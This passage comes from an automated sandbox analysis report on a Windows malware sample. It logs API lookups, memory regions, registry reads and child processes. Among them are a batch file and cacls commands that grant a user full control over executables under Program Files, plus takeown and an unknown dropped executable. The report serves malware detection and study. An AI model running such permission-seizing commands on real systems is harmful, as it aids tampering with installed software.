| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:04 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #118: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #118 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:29, Reason: Child Process |
| Unmonitor | End Time: 00:03:18, Reason: Self Terminated |
| Monitor Duration | 00:00:49 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x614 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
344
0x
A34
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x04a8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04aaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a90000 | 0x04a90000 | 0x04a9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004aa0000 | 0x04aa0000 | 0x04aa3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04ab1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04ab3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ac0000 | 0x04ac0000 | 0x04ad3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ae0000 | 0x04ae0000 | 0x04b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04c1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c20000 | 0x04c20000 | 0x04c23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004c30000 | 0x04c30000 | 0x04c30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04c41fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c50000 | 0x04d0dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004d10000 | 0x04d10000 | 0x04d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d20000 | 0x04d20000 | 0x04d2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x04faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fb0000 | 0x04fb0000 | 0x051affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x051b0000 | 0x054e6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f120000 | 0x7f120000 | 0x7f21ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f220000 | 0x7f220000 | 0x7f242fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f248000 | 0x7f248000 | 0x7f24afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f24b000 | 0x7f24b000 | 0x7f24dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f24e000 | 0x7f24e000 | 0x7f24efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f24f000 | 0x7f24f000 | 0x7f24ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 84 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 25 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xda0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x9ec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xe8c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "ImagingDevices.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "ImagingDevices.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #119: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #119 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\recorder.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:29, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x930 |
| Parent PID | 0x524 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
8B0
0x
76C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000002b0000 | 0x002b0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00383fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00390fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x003b0000 | 0x0046dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x004b0000 | 0x004b1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000690000 | 0x00690000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00790000 | 0x00ac6fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e5d0000 | 0x7e5d0000 | 0x7e6cffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e6d0000 | 0x7e6d0000 | 0x7e6f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e6f8000 | 0x7e6f8000 | 0x7e6fafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e6fb000 | 0x7e6fb000 | 0x7e6fdfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e6fe000 | 0x7e6fe000 | 0x7e6fefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e6ff000 | 0x7e6ff000 | 0x7e6fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #120: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #120 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:29, Reason: Child Process |
| Unmonitor | End Time: 00:02:37, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x64c |
| Parent PID | 0x764 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
5E0
0x
770
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000e10000 | 0x00e10000 | 0x00e2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e10000 | 0x00e10000 | 0x00e1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000e20000 | 0x00e20000 | 0x00e23fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e30000 | 0x00e30000 | 0x00e31fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e30000 | 0x00e30000 | 0x00e33fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e40000 | 0x00e40000 | 0x00e53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ea0000 | 0x00ea0000 | 0x00edffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ee0000 | 0x00ee0000 | 0x00ee3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ef0000 | 0x00ef0000 | 0x00ef0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f00000 | 0x00f00000 | 0x00f01fff | Private Memory | rw |
|
|
|
- |
